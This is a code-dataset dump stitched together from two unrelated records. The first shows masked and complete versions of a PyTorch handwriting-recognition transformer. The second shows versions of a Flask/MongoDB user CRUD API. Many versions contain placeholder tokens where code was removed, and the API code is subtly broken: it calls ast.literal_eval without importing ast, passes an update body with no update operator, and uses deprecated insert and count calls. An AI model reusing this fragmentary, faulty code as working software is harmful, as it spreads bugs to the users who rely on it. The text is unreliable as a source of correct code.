math.sqrt(self.f)\n x = self.pe_decode(x)\n dim = x.size()[0]\n a = self.generate_square_subsequent_mask(dim).to(x.device)\n x = self.transformer_decoder(x, y, a, tgt_key_padding_mask=kpm)\n return self.linear(x).permute(1, 0, 2)\n\n def forward(self, x, y):\n return self.decode(x, self.encode(y))\n\n @torch.no_grad()\n def to_text_(self, x, bulk=True):\n txt = []\n p = {self.alphabet['<E>']}\n s = {self.alphabet['<S>'], self.alphabet['<P>']}\n for idx in x:\n if not bulk:\n if idx in p:\n break\n if idx in s:\n continue\n txt.append(self.inv_alphabet[idx])\n return txt if bulk else 
''.join(txt)\n\n @torch.no_grad()\n def to_text(self, x, bulk=False):\n x = x.cpu().numpy()\n if len(x.shape) == 2:\n return [self.to_text_(x[i], bulk=bulk) for i in range(x.shape[0])]\n else:\n return self.to_text_(x, bulk=bulk)\n\n @torch.no_grad()\n def gen(self, y, bulk=False):\n y = self.encode(y)\n output_tokens = torch.full((y.size()[1], self.text_len), self.\n alphabet['<P>']).long()\n output_tokens[:, 0] = self.alphabet['<S>']\n output_tokens = output_tokens.to(y.device)\n for j in range(1, self.text_len):\n x = output_tokens[:, :j].permute(1, 0)\n x = self.decode(x, y)\n a = torch.argmax(x, dim=-1)\n output_tokens[:, j] = a[:, -1]\n if bulk:\n return self.to_text(output_tokens[:, 1:], bulk=True), output_tokens\n else:\n return self.to_text(output_tokens)\n\n\n<mask token>\n\n\ndef load_batch_image(max_img=2):\n return torch.cat([load_image(os.path.join('debug-data', f'{i}.png')) for\n i in range(1, max_img + 1)], dim=0).unsqueeze(1)\n\n\n<mask token>\n\n\ndef get(x):\n a = character_dict.get(x, None)\n if a is None:\n idx = len(character_dict)\n character_dict[x] = idx\n return idx\n else:\n return a\n\n\n<mask token>\n\n\ndef load_text_tensor(txt):\n return torch.LongTensor([ALPHABET[t] for t in load_text(txt)]).unsqueeze(1)\n\n\ndef load_batch_text():\n return torch.cat([load_text_tensor(TXT[i]) for i in range(2)], dim=1)\n\n\nif __name__ == '__main__':\n transformer = TransformerHTR(ALPHABET, text_len=MAX_LEN)\n bt = load_batch_text()\n print(bt.size())\n b = transformer(bt[0:transformer.text_len, :], load_batch_image())\n criterion = nn.CrossEntropyLoss()\n loss = 0\n trgt = bt[1:, :]\n for i in range(trgt.size()[1]):\n loss += criterion(b[i], trgt[:, i])\n loss.backward()\n out = transformer.gen(load_batch_image())\n print(out)\n",
"step-4": "import torch\nfrom torch import nn\nfrom torch.nn import functional as F\nimport torchvision\nimport math\nfrom torchvision.models.resnet import Bottleneck\nfrom dataset import load_image, load_text, ALPHABET, MAX_LEN\n\n\nclass ResNetFeatures(nn.Module):\n\n def __init__(self, pretrained=True):\n super().__init__()\n self.resnet = torchvision.models.resnet50(pretrained=pretrained)\n\n def forward(self, x):\n x = self.resnet.conv1(x.repeat(1, 3, 1, 1))\n x = self.resnet.bn1(x)\n x = self.resnet.relu(x)\n x = self.resnet.maxpool(x)\n x = self.resnet.layer1(x)\n x = self.resnet.layer2(x)\n x = self.resnet.layer3(x)\n return x\n\n\nclass PositionalEncoding(nn.Module):\n\n def __init__(self, d_model, max_len, dropout=0.1):\n super(PositionalEncoding, self).__init__()\n self.dropout = nn.Dropout(p=dropout)\n pe = torch.zeros(max_len, d_model)\n position = torch.arange(0, max_len, dtype=torch.float).unsqueeze(1)\n div_term = torch.exp(torch.arange(0, d_model, 2).float() * (-math.\n log(10000.0) / d_model))\n pe[:, 0::2] = torch.sin(position * div_term)\n pe[:, 1::2] = torch.cos(position * div_term)\n pe = pe.unsqueeze(0).transpose(0, 1)\n self.register_buffer('pe', pe)\n\n def forward(self, x):\n x = x + self.pe[:x.size(0), :]\n return self.dropout(x)\n\n\nclass TransformerHTR(nn.Module):\n\n def __init__(self, alphabet, freeze_resnet=False, use_encoder=False,\n dict_size=83, f=1024, num_layers=4, num_heads=8, dropout=0.1,\n text_len=100):\n super(TransformerHTR, self).__init__()\n self.resnet = ResNetFeatures()\n if freeze_resnet:\n print('Freezing-resnet')\n for param in self.resnet.resnet.parameters():\n param.requires_grad = False\n self.fc = nn.Linear(f * 4, f)\n self.pe_encode = PositionalEncoding(f, 140, dropout)\n self.fc_bar = nn.Linear(f, f)\n if use_encoder:\n print('Transformer Encoder')\n encoder_layers = nn.TransformerEncoderLayer(f, num_heads, f,\n dropout)\n self.transformer_encoder = nn.TransformerEncoder(encoder_layers,\n num_layers)\n 
else:\n print('Identity encoder')\n self.transformer_encoder = nn.Identity()\n self.layer_norm = nn.LayerNorm(f)\n print('freeze-resnet', freeze_resnet)\n print('use_encoder', use_encoder)\n self.ebl = nn.Embedding(dict_size, f)\n self.pe_decode = PositionalEncoding(f, text_len, dropout)\n decoder_layer = nn.TransformerDecoderLayer(d_model=f, nhead=\n num_heads, dim_feedforward=f, dropout=dropout)\n self.transformer_decoder = nn.TransformerDecoder(decoder_layer,\n num_layers=num_layers)\n self.linear = nn.Linear(f, dict_size)\n self.f = f\n self.text_len = text_len\n self.alphabet = alphabet\n self.inv_alphabet = {j: i for i, j in alphabet.items()}\n self.init_weights()\n\n def init_weights(self):\n initrange = 0.1\n self.fc.bias.data.zero_()\n self.fc.weight.data.uniform_(-initrange, initrange)\n self.fc_bar.bias.data.zero_()\n self.fc_bar.weight.data.uniform_(-initrange, initrange)\n self.ebl.weight.data.uniform_(-initrange, initrange)\n self.linear.bias.data.zero_()\n self.linear.weight.data.uniform_(-initrange, initrange)\n\n def generate_square_subsequent_mask(self, sz):\n mask = (torch.triu(torch.ones(sz, sz)) == 1).transpose(0, 1)\n mask = mask.float().masked_fill(mask == 0, float('-inf')).masked_fill(\n mask == 1, float(0.0))\n return mask\n\n def encode(self, x):\n x = self.resnet(x)\n b, f, h, w = x.size()\n x = x.view(b, f * h, w).permute(0, 2, 1)\n x = self.fc(x)\n x = self.pe_encode(x.permute(1, 0, 2))\n x = self.fc_bar(x)\n x = self.transformer_encoder(x)\n return x\n\n def decode(self, x, y):\n kpm = (x == self.alphabet['<P>']).transpose(1, 0)\n x = self.ebl(x) * math.sqrt(self.f)\n x = self.pe_decode(x)\n dim = x.size()[0]\n a = self.generate_square_subsequent_mask(dim).to(x.device)\n x = self.transformer_decoder(x, y, a, tgt_key_padding_mask=kpm)\n return self.linear(x).permute(1, 0, 2)\n\n def forward(self, x, y):\n return self.decode(x, self.encode(y))\n\n @torch.no_grad()\n def to_text_(self, x, bulk=True):\n txt = []\n p = 
{self.alphabet['<E>']}\n s = {self.alphabet['<S>'], self.alphabet['<P>']}\n for idx in x:\n if not bulk:\n if idx in p:\n break\n if idx in s:\n continue\n txt.append(self.inv_alphabet[idx])\n return txt if bulk else ''.join(txt)\n\n @torch.no_grad()\n def to_text(self, x, bulk=False):\n x = x.cpu().numpy()\n if len(x.shape) == 2:\n return [self.to_text_(x[i], bulk=bulk) for i in range(x.shape[0])]\n else:\n return self.to_text_(x, bulk=bulk)\n\n @torch.no_grad()\n def gen(self, y, bulk=False):\n y = self.encode(y)\n output_tokens = torch.full((y.size()[1], self.text_len), self.\n alphabet['<P>']).long()\n output_tokens[:, 0] = self.alphabet['<S>']\n output_tokens = output_tokens.to(y.device)\n for j in range(1, self.text_len):\n x = output_tokens[:, :j].permute(1, 0)\n x = self.decode(x, y)\n a = torch.argmax(x, dim=-1)\n output_tokens[:, j] = a[:, -1]\n if bulk:\n return self.to_text(output_tokens[:, 1:], bulk=True), output_tokens\n else:\n return self.to_text(output_tokens)\n\n\nimport os\nimport torchvision\nimport numpy as np\nfrom torchvision.transforms.functional import resize, pil_to_tensor\nimport PIL\n\n\ndef load_batch_image(max_img=2):\n return torch.cat([load_image(os.path.join('debug-data', f'{i}.png')) for\n i in range(1, max_img + 1)], dim=0).unsqueeze(1)\n\n\ncharacter_dict = dict()\n\n\ndef get(x):\n a = character_dict.get(x, None)\n if a is None:\n idx = len(character_dict)\n character_dict[x] = idx\n return idx\n else:\n return a\n\n\nTXT = ['A|MOVE|to|stop|Mr.|Gaitskell|from',\n 'nominating|any|more|Labour|life|Peers']\n\n\ndef load_text_tensor(txt):\n return torch.LongTensor([ALPHABET[t] for t in load_text(txt)]).unsqueeze(1)\n\n\ndef load_batch_text():\n return torch.cat([load_text_tensor(TXT[i]) for i in range(2)], dim=1)\n\n\nif __name__ == '__main__':\n transformer = TransformerHTR(ALPHABET, text_len=MAX_LEN)\n bt = load_batch_text()\n print(bt.size())\n b = transformer(bt[0:transformer.text_len, :], load_batch_image())\n criterion = 
nn.CrossEntropyLoss()\n loss = 0\n trgt = bt[1:, :]\n for i in range(trgt.size()[1]):\n loss += criterion(b[i], trgt[:, i])\n loss.backward()\n out = transformer.gen(load_batch_image())\n print(out)\n",
"step-5": "import torch\nfrom torch import nn\nfrom torch.nn import functional as F\nimport torchvision\nimport math\nfrom torchvision.models.resnet import Bottleneck\nfrom dataset import load_image, load_text, ALPHABET, MAX_LEN\n\n\nclass ResNetFeatures(nn.Module):\n def __init__(self, pretrained=True):\n super().__init__()\n # Input images x of handwritten text-lines, which might have\n # arbitrary lengths, are first processed by a Convolutional\n # Neural Network. We obtain an intermediate visual feature\n # representation Fc of size f. We use the ResNet50 [26] as\n # our backbone convolutional architecture. \n # Such visual feature representation has a contextualized global view of the\n # whole input image while remaining compact.\n self.resnet = torchvision.models.resnet50(pretrained=pretrained)\n # self.resnet.inplanes = 512\n # self.layer3 = self.resnet._make_layer(Bottleneck, 256, 6, stride=1, dilate=False)\n\n def forward(self, x):\n # From https://github.com/pytorch/vision/blob/master/torchvision/models/resnet.py\n x = self.resnet.conv1(x.repeat(1, 3, 1, 1))\n x = self.resnet.bn1(x)\n x = self.resnet.relu(x)\n x = self.resnet.maxpool(x)\n x = self.resnet.layer1(x)\n x = self.resnet.layer2(x)\n x = self.resnet.layer3(x)\n return x\n\n\nclass PositionalEncoding(nn.Module):\n def __init__(self, d_model, max_len, dropout=0.1):\n super(PositionalEncoding, self).__init__()\n self.dropout = nn.Dropout(p=dropout)\n pe = torch.zeros(max_len, d_model)\n position = torch.arange(0, max_len, dtype=torch.float).unsqueeze(1)\n div_term = torch.exp(torch.arange(0, d_model, 2).float() * (-math.log(10000.0) / d_model))\n pe[:, 0::2] = torch.sin(position * div_term)\n pe[:, 1::2] = torch.cos(position * div_term)\n pe = pe.unsqueeze(0).transpose(0, 1)\n self.register_buffer('pe', pe)\n\n def forward(self, x):\n x = x + self.pe[:x.size(0), :]\n return self.dropout(x)\n\n\nclass TransformerHTR(nn.Module):\n def __init__(self, alphabet, freeze_resnet=False, use_encoder=False, 
dict_size=83, f=1024, num_layers=4, num_heads=8, dropout=0.1, text_len=100):\n super(TransformerHTR, self).__init__()\n # (Visual Feature) Encoder\n self.resnet = ResNetFeatures()\n if freeze_resnet:\n print('Freezing-resnet')\n for param in self.resnet.resnet.parameters():\n param.requires_grad = False\n self.fc = nn.Linear(f*4, f)\n self.pe_encode = PositionalEncoding(f, 140, dropout)\n self.fc_bar = nn.Linear(f, f)\n if use_encoder:\n print('Transformer Encoder')\n encoder_layers = nn.TransformerEncoderLayer(f, num_heads, f, dropout)\n self.transformer_encoder = nn.TransformerEncoder(encoder_layers, num_layers)\n else:\n print('Identity encoder')\n self.transformer_encoder = nn.Identity()\n self.layer_norm = nn.LayerNorm(f)\n\n print('freeze-resnet', freeze_resnet)\n print('use_encoder', use_encoder)\n # (Text Transcriber) Decoder\n self.ebl = nn.Embedding(dict_size, f)\n self.pe_decode = PositionalEncoding(f, text_len, dropout)\n decoder_layer = nn.TransformerDecoderLayer(d_model=f, nhead=num_heads, dim_feedforward=f, dropout=dropout)\n self.transformer_decoder = nn.TransformerDecoder(decoder_layer, num_layers=num_layers)\n self.linear = nn.Linear(f, dict_size)\n\n # General\n self.f = f\n self.text_len = text_len\n self.alphabet = alphabet\n self.inv_alphabet = {j: i for i, j in alphabet.items()}\n self.init_weights()\n \n\n def init_weights(self):\n initrange = 0.1\n self.fc.bias.data.zero_()\n self.fc.weight.data.uniform_(-initrange, initrange)\n self.fc_bar.bias.data.zero_()\n self.fc_bar.weight.data.uniform_(-initrange, initrange)\n self.ebl.weight.data.uniform_(-initrange, initrange)\n self.linear.bias.data.zero_()\n self.linear.weight.data.uniform_(-initrange, initrange)\n\n def generate_square_subsequent_mask(self, sz):\n mask = (torch.triu(torch.ones(sz, sz)) == 1).transpose(0, 1)\n mask = mask.float().masked_fill(mask == 0, float('-inf')).masked_fill(mask == 1, float(0.0))\n return mask\n\n def encode(self, x):\n x = self.resnet(x)\n b, f, h, w = 
x.size()\n x = x.view(b, f*h, w).permute(0, 2, 1)\n # x = F.relu(self.fc(x))\n x = self.fc(x)\n x = self.pe_encode(x.permute(1, 0, 2))\n # x = F.relu(self.fc_bar(x))\n x = self.fc_bar(x)\n x = self.transformer_encoder(x)\n # x = self.layer_norm(x)\n return x\n\n def decode(self, x, y):\n kpm = (x == self.alphabet['<P>']).transpose(1, 0)\n x = self.ebl(x)*math.sqrt(self.f)\n x = self.pe_decode(x)\n dim = x.size()[0]\n a = self.generate_square_subsequent_mask(dim).to(x.device)\n x = self.transformer_decoder(x, y, a, tgt_key_padding_mask=kpm)\n return self.linear(x).permute(1, 0, 2)\n\n def forward(self, x, y):\n return self.decode(x, self.encode(y))\n\n @torch.no_grad()\n def to_text_(self, x, bulk=True):\n txt = []\n p = {self.alphabet[\"<E>\"]}\n s = {self.alphabet[\"<S>\"], self.alphabet[\"<P>\"]}\n for idx in x:\n if not bulk:\n if idx in p:\n break\n if idx in s:\n continue\n txt.append(self.inv_alphabet[idx])\n return (txt if bulk else \"\".join(txt))\n\n @torch.no_grad()\n def to_text(self, x, bulk=False):\n x = x.cpu().numpy()\n if len(x.shape) == 2:\n return [self.to_text_(x[i], bulk=bulk) for i in range(x.shape[0])]\n else:\n return self.to_text_(x, bulk=bulk)\n\n @torch.no_grad()\n def gen(self, y, bulk=False):\n y = self.encode(y)\n output_tokens = torch.full((y.size()[1], self.text_len), self.alphabet[\"<P>\"]).long()\n output_tokens[:, 0] = self.alphabet[\"<S>\"]\n output_tokens = output_tokens.to(y.device)\n for j in range(1, self.text_len):\n x = output_tokens[:, :j].permute(1, 0)\n x = self.decode(x, y)\n a = torch.argmax(x, dim=-1)\n output_tokens[:, j] = a[:,-1]\n if bulk:\n return self.to_text(output_tokens[:, 1:], bulk=True), output_tokens\n else:\n return self.to_text(output_tokens)\n\n\n\n# DEBUG\nimport os\nimport torchvision\nimport numpy as np\nfrom torchvision.transforms.functional import resize, pil_to_tensor\nimport PIL\n\ndef load_batch_image(max_img=2):\n # Each batch should have \n return 
torch.cat([load_image(os.path.join('debug-data', f\"{i}.png\")) for i in range(1, max_img+1)], dim=0).unsqueeze(1)\n\ncharacter_dict = dict()\ndef get(x):\n a = character_dict.get(x, None)\n if a is None:\n idx = len(character_dict)\n character_dict[x] = idx\n return idx\n else:\n return a\n\nTXT = [\"A|MOVE|to|stop|Mr.|Gaitskell|from\", \"nominating|any|more|Labour|life|Peers\"]\ndef load_text_tensor(txt):\n return torch.LongTensor([ALPHABET[t] for t in load_text(txt)]).unsqueeze(1)\n\ndef load_batch_text():\n return torch.cat([load_text_tensor(TXT[i]) for i in range(2)], dim=1)\n\nif __name__ == \"__main__\":\n # load two images\n transformer = TransformerHTR(ALPHABET, text_len=MAX_LEN)\n bt = load_batch_text()\n print(bt.size())\n b = transformer(bt[0:transformer.text_len, :], load_batch_image())\n criterion = nn.CrossEntropyLoss()\n loss = 0\n trgt = bt[1:, :]\n for i in range(trgt.size()[1]):\n loss += criterion(b[i], trgt[:, i])\n loss.backward()\n out = transformer.gen(load_batch_image())\n print(out)",
"step-ids": [
12,
18,
21,
23,
24
]
}
|
[
12,
18,
21,
23,
24
] |
<|reserved_special_token_0|>
@app.route('/api/v1/users', methods=['POST'])
def create_user():
"""
Function to create new users.
"""
try:
try:
body = request.get_json()
except:
return abort(400)
record_id = collection.insert(body)
return jsonify({'message': 'Successfully Created the resource.'}), 201
except:
return 'Error while trying to create the resource', 500
@app.route('/api/v1/users', methods=['GET'])
def fetch_users():
"""
Function to fetch the users.
"""
try:
records_fetched = collection.find()
if records_fetched.count() > 0:
records = dumps(records_fetched)
resp = Response(records, status=200, mimetype='application/json')
return resp
else:
return jsonify({'message': 'No records are found'}), 404
except Exception as e:
print(str(e))
return jsonify({'message': 'Error while trying to fetch the resource'}
), 500
@app.route('/api/v1/users/<user_id>', methods=['POST'])
def update_user(user_id):
"""
Function to update the user.
"""
try:
try:
body = ast.literal_eval(json.dumps(request.get_json()))
except:
return '', 400
records_updated = collection.update_one({'id': int(user_id)}, body)
if records_updated.modified_count > 0:
return '', 200
else:
return '', 404
except:
return '', 500
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@app.route('/api/v1/users', methods=['POST'])
def create_user():
"""
Function to create new users.
"""
try:
try:
body = request.get_json()
except:
return abort(400)
record_id = collection.insert(body)
return jsonify({'message': 'Successfully Created the resource.'}), 201
except:
return 'Error while trying to create the resource', 500
@app.route('/api/v1/users', methods=['GET'])
def fetch_users():
"""
Function to fetch the users.
"""
try:
records_fetched = collection.find()
if records_fetched.count() > 0:
records = dumps(records_fetched)
resp = Response(records, status=200, mimetype='application/json')
return resp
else:
return jsonify({'message': 'No records are found'}), 404
except Exception as e:
print(str(e))
return jsonify({'message': 'Error while trying to fetch the resource'}
), 500
@app.route('/api/v1/users/<user_id>', methods=['POST'])
def update_user(user_id):
"""
Function to update the user.
"""
try:
try:
body = ast.literal_eval(json.dumps(request.get_json()))
except:
return '', 400
records_updated = collection.update_one({'id': int(user_id)}, body)
if records_updated.modified_count > 0:
return '', 200
else:
return '', 404
except:
return '', 500
@app.route('/api/v1/users/<user_id>', methods=['DELETE'])
def remove_user(user_id):
"""
Function to remove the user.
"""
try:
delete_user = collection.delete_one({'id': int(user_id)})
if delete_user.deleted_count > 0:
return '', 204
else:
return '', 404
except:
return '', 500
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@app.route('/api/v1/users', methods=['POST'])
def create_user():
"""
Function to create new users.
"""
try:
try:
body = request.get_json()
except:
return abort(400)
record_id = collection.insert(body)
return jsonify({'message': 'Successfully Created the resource.'}), 201
except:
return 'Error while trying to create the resource', 500
@app.route('/api/v1/users', methods=['GET'])
def fetch_users():
"""
Function to fetch the users.
"""
try:
records_fetched = collection.find()
if records_fetched.count() > 0:
records = dumps(records_fetched)
resp = Response(records, status=200, mimetype='application/json')
return resp
else:
return jsonify({'message': 'No records are found'}), 404
except Exception as e:
print(str(e))
return jsonify({'message': 'Error while trying to fetch the resource'}
), 500
@app.route('/api/v1/users/<user_id>', methods=['POST'])
def update_user(user_id):
"""
Function to update the user.
"""
try:
try:
body = ast.literal_eval(json.dumps(request.get_json()))
except:
return '', 400
records_updated = collection.update_one({'id': int(user_id)}, body)
if records_updated.modified_count > 0:
return '', 200
else:
return '', 404
except:
return '', 500
@app.route('/api/v1/users/<user_id>', methods=['DELETE'])
def remove_user(user_id):
"""
Function to remove the user.
"""
try:
delete_user = collection.delete_one({'id': int(user_id)})
if delete_user.deleted_count > 0:
return '', 204
else:
return '', 404
except:
return '', 500
@app.errorhandler(404)
def page_not_found(e):
"""Send message to the user with notFound 404 status."""
message = {'err': {'msg':
'This route is currently not supported. Please refer API documentation.'
}}
resp = jsonify(message)
resp.status_code = 404
return resp
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import json
from bson.json_util import dumps
from flask import abort, request, Response, jsonify
from api import app, collection
@app.route('/api/v1/users', methods=['POST'])
def create_user():
"""
Function to create new users.
"""
try:
try:
body = request.get_json()
except:
return abort(400)
record_id = collection.insert(body)
return jsonify({'message': 'Successfully Created the resource.'}), 201
except:
return 'Error while trying to create the resource', 500
@app.route('/api/v1/users', methods=['GET'])
def fetch_users():
"""
Function to fetch the users.
"""
try:
records_fetched = collection.find()
if records_fetched.count() > 0:
records = dumps(records_fetched)
resp = Response(records, status=200, mimetype='application/json')
return resp
else:
return jsonify({'message': 'No records are found'}), 404
except Exception as e:
print(str(e))
return jsonify({'message': 'Error while trying to fetch the resource'}
), 500
@app.route('/api/v1/users/<user_id>', methods=['POST'])
def update_user(user_id):
"""
Function to update the user.
"""
try:
try:
body = ast.literal_eval(json.dumps(request.get_json()))
except:
return '', 400
records_updated = collection.update_one({'id': int(user_id)}, body)
if records_updated.modified_count > 0:
return '', 200
else:
return '', 404
except:
return '', 500
@app.route('/api/v1/users/<user_id>', methods=['DELETE'])
def remove_user(user_id):
"""
Function to remove the user.
"""
try:
delete_user = collection.delete_one({'id': int(user_id)})
if delete_user.deleted_count > 0:
return '', 204
else:
return '', 404
except:
return '', 500
@app.errorhandler(404)
def page_not_found(e):
"""Send message to the user with notFound 404 status."""
message = {'err': {'msg':
'This route is currently not supported. Please refer API documentation.'
}}
resp = jsonify(message)
resp.status_code = 404
return resp
<|reserved_special_token_1|>
"""This module will serve the api request."""
import json
from bson.json_util import dumps
from flask import abort, request, Response, jsonify
from api import app, collection
@app.route("/api/v1/users", methods=['POST'])
def create_user():
"""
Function to create new users.
"""
try:
# Create new user
try:
body = request.get_json()
except:
# Bad request as request body is not available
return abort(400)
record_id = collection.insert(body)
return jsonify({"message":"Successfully Created the resource."}), 201
except:
# Error while trying to create the resource
return "Error while trying to create the resource", 500
@app.route("/api/v1/users", methods=['GET'])
def fetch_users():
"""
Function to fetch the users.
"""
try:
# Fetch all the record(s)
records_fetched = collection.find()
# Check if the records are found
if records_fetched.count() > 0:
# Prepare the response
records = dumps(records_fetched)
resp = Response(records, status=200, mimetype='application/json')
return resp
else:
# No records are found
return jsonify({"message":"No records are found"}), 404
except Exception as e:
print(str(e))
# Error while trying to fetch the resource
return jsonify({"message":"Error while trying to fetch the resource"}), 500
@app.route("/api/v1/users/<user_id>", methods=['POST'])
def update_user(user_id):
"""
Function to update the user.
"""
try:
# Get the value which needs to be updated
try:
body = ast.literal_eval(json.dumps(request.get_json()))
except:
# Bad request as the request body is not available
# Add message for debugging purpose
return "", 400
# Updating the user
records_updated = collection.update_one({"id": int(user_id)}, body)
# Check if resource is updated
if records_updated.modified_count > 0:
# Prepare the response as resource is updated successfully
return "", 200
else:
# Bad request as the resource is not available to update
# Add message for debugging purpose
return "", 404
except:
# Error while trying to update the resource
# Add message for debugging purpose
return "", 500
@app.route("/api/v1/users/<user_id>", methods=['DELETE'])
def remove_user(user_id):
"""
Function to remove the user.
"""
try:
# Delete the user
delete_user = collection.delete_one({"id": int(user_id)})
if delete_user.deleted_count > 0 :
# Prepare the response
return "", 204
else:
# Resource Not found
return "", 404
except:
# Error while trying to delete the resource
# Add message for debugging purpose
return "", 500
@app.errorhandler(404)
def page_not_found(e):
    """Send message to the user with notFound 404 status."""
    # Payload returned for any route the API does not serve.
    payload = {
        "err": {
            "msg": "This route is currently not supported. Please refer API documentation."
        }
    }
    # jsonify produces an application/json response; tag it 404 and return.
    response = jsonify(payload)
    response.status_code = 404
    return response
|
flexible
|
{
"blob_id": "0f4bb65b93df997ca1a9b7945ebcec53a2f43822",
"index": 3636,
"step-1": "<mask token>\n\n\[email protected]('/api/v1/users', methods=['POST'])\ndef create_user():\n \"\"\"\n Function to create new users.\n \"\"\"\n try:\n try:\n body = request.get_json()\n except:\n return abort(400)\n record_id = collection.insert(body)\n return jsonify({'message': 'Successfully Created the resource.'}), 201\n except:\n return 'Error while trying to create the resource', 500\n\n\[email protected]('/api/v1/users', methods=['GET'])\ndef fetch_users():\n \"\"\"\n Function to fetch the users.\n \"\"\"\n try:\n records_fetched = collection.find()\n if records_fetched.count() > 0:\n records = dumps(records_fetched)\n resp = Response(records, status=200, mimetype='application/json')\n return resp\n else:\n return jsonify({'message': 'No records are found'}), 404\n except Exception as e:\n print(str(e))\n return jsonify({'message': 'Error while trying to fetch the resource'}\n ), 500\n\n\[email protected]('/api/v1/users/<user_id>', methods=['POST'])\ndef update_user(user_id):\n \"\"\"\n Function to update the user.\n \"\"\"\n try:\n try:\n body = ast.literal_eval(json.dumps(request.get_json()))\n except:\n return '', 400\n records_updated = collection.update_one({'id': int(user_id)}, body)\n if records_updated.modified_count > 0:\n return '', 200\n else:\n return '', 404\n except:\n return '', 500\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\[email protected]('/api/v1/users', methods=['POST'])\ndef create_user():\n \"\"\"\n Function to create new users.\n \"\"\"\n try:\n try:\n body = request.get_json()\n except:\n return abort(400)\n record_id = collection.insert(body)\n return jsonify({'message': 'Successfully Created the resource.'}), 201\n except:\n return 'Error while trying to create the resource', 500\n\n\[email protected]('/api/v1/users', methods=['GET'])\ndef fetch_users():\n \"\"\"\n Function to fetch the users.\n \"\"\"\n try:\n records_fetched = collection.find()\n if records_fetched.count() > 0:\n records = dumps(records_fetched)\n resp = Response(records, status=200, mimetype='application/json')\n return resp\n else:\n return jsonify({'message': 'No records are found'}), 404\n except Exception as e:\n print(str(e))\n return jsonify({'message': 'Error while trying to fetch the resource'}\n ), 500\n\n\[email protected]('/api/v1/users/<user_id>', methods=['POST'])\ndef update_user(user_id):\n \"\"\"\n Function to update the user.\n \"\"\"\n try:\n try:\n body = ast.literal_eval(json.dumps(request.get_json()))\n except:\n return '', 400\n records_updated = collection.update_one({'id': int(user_id)}, body)\n if records_updated.modified_count > 0:\n return '', 200\n else:\n return '', 404\n except:\n return '', 500\n\n\[email protected]('/api/v1/users/<user_id>', methods=['DELETE'])\ndef remove_user(user_id):\n \"\"\"\n Function to remove the user.\n \"\"\"\n try:\n delete_user = collection.delete_one({'id': int(user_id)})\n if delete_user.deleted_count > 0:\n return '', 204\n else:\n return '', 404\n except:\n return '', 500\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\[email protected]('/api/v1/users', methods=['POST'])\ndef create_user():\n \"\"\"\n Function to create new users.\n \"\"\"\n try:\n try:\n body = request.get_json()\n except:\n return abort(400)\n record_id = collection.insert(body)\n return jsonify({'message': 'Successfully Created the resource.'}), 201\n except:\n return 'Error while trying to create the resource', 500\n\n\[email protected]('/api/v1/users', methods=['GET'])\ndef fetch_users():\n \"\"\"\n Function to fetch the users.\n \"\"\"\n try:\n records_fetched = collection.find()\n if records_fetched.count() > 0:\n records = dumps(records_fetched)\n resp = Response(records, status=200, mimetype='application/json')\n return resp\n else:\n return jsonify({'message': 'No records are found'}), 404\n except Exception as e:\n print(str(e))\n return jsonify({'message': 'Error while trying to fetch the resource'}\n ), 500\n\n\[email protected]('/api/v1/users/<user_id>', methods=['POST'])\ndef update_user(user_id):\n \"\"\"\n Function to update the user.\n \"\"\"\n try:\n try:\n body = ast.literal_eval(json.dumps(request.get_json()))\n except:\n return '', 400\n records_updated = collection.update_one({'id': int(user_id)}, body)\n if records_updated.modified_count > 0:\n return '', 200\n else:\n return '', 404\n except:\n return '', 500\n\n\[email protected]('/api/v1/users/<user_id>', methods=['DELETE'])\ndef remove_user(user_id):\n \"\"\"\n Function to remove the user.\n \"\"\"\n try:\n delete_user = collection.delete_one({'id': int(user_id)})\n if delete_user.deleted_count > 0:\n return '', 204\n else:\n return '', 404\n except:\n return '', 500\n\n\[email protected](404)\ndef page_not_found(e):\n \"\"\"Send message to the user with notFound 404 status.\"\"\"\n message = {'err': {'msg':\n 'This route is currently not supported. Please refer API documentation.'\n }}\n resp = jsonify(message)\n resp.status_code = 404\n return resp\n",
"step-4": "<mask token>\nimport json\nfrom bson.json_util import dumps\nfrom flask import abort, request, Response, jsonify\nfrom api import app, collection\n\n\[email protected]('/api/v1/users', methods=['POST'])\ndef create_user():\n \"\"\"\n Function to create new users.\n \"\"\"\n try:\n try:\n body = request.get_json()\n except:\n return abort(400)\n record_id = collection.insert(body)\n return jsonify({'message': 'Successfully Created the resource.'}), 201\n except:\n return 'Error while trying to create the resource', 500\n\n\[email protected]('/api/v1/users', methods=['GET'])\ndef fetch_users():\n \"\"\"\n Function to fetch the users.\n \"\"\"\n try:\n records_fetched = collection.find()\n if records_fetched.count() > 0:\n records = dumps(records_fetched)\n resp = Response(records, status=200, mimetype='application/json')\n return resp\n else:\n return jsonify({'message': 'No records are found'}), 404\n except Exception as e:\n print(str(e))\n return jsonify({'message': 'Error while trying to fetch the resource'}\n ), 500\n\n\[email protected]('/api/v1/users/<user_id>', methods=['POST'])\ndef update_user(user_id):\n \"\"\"\n Function to update the user.\n \"\"\"\n try:\n try:\n body = ast.literal_eval(json.dumps(request.get_json()))\n except:\n return '', 400\n records_updated = collection.update_one({'id': int(user_id)}, body)\n if records_updated.modified_count > 0:\n return '', 200\n else:\n return '', 404\n except:\n return '', 500\n\n\[email protected]('/api/v1/users/<user_id>', methods=['DELETE'])\ndef remove_user(user_id):\n \"\"\"\n Function to remove the user.\n \"\"\"\n try:\n delete_user = collection.delete_one({'id': int(user_id)})\n if delete_user.deleted_count > 0:\n return '', 204\n else:\n return '', 404\n except:\n return '', 500\n\n\[email protected](404)\ndef page_not_found(e):\n \"\"\"Send message to the user with notFound 404 status.\"\"\"\n message = {'err': {'msg':\n 'This route is currently not supported. 
Please refer API documentation.'\n }}\n resp = jsonify(message)\n resp.status_code = 404\n return resp\n",
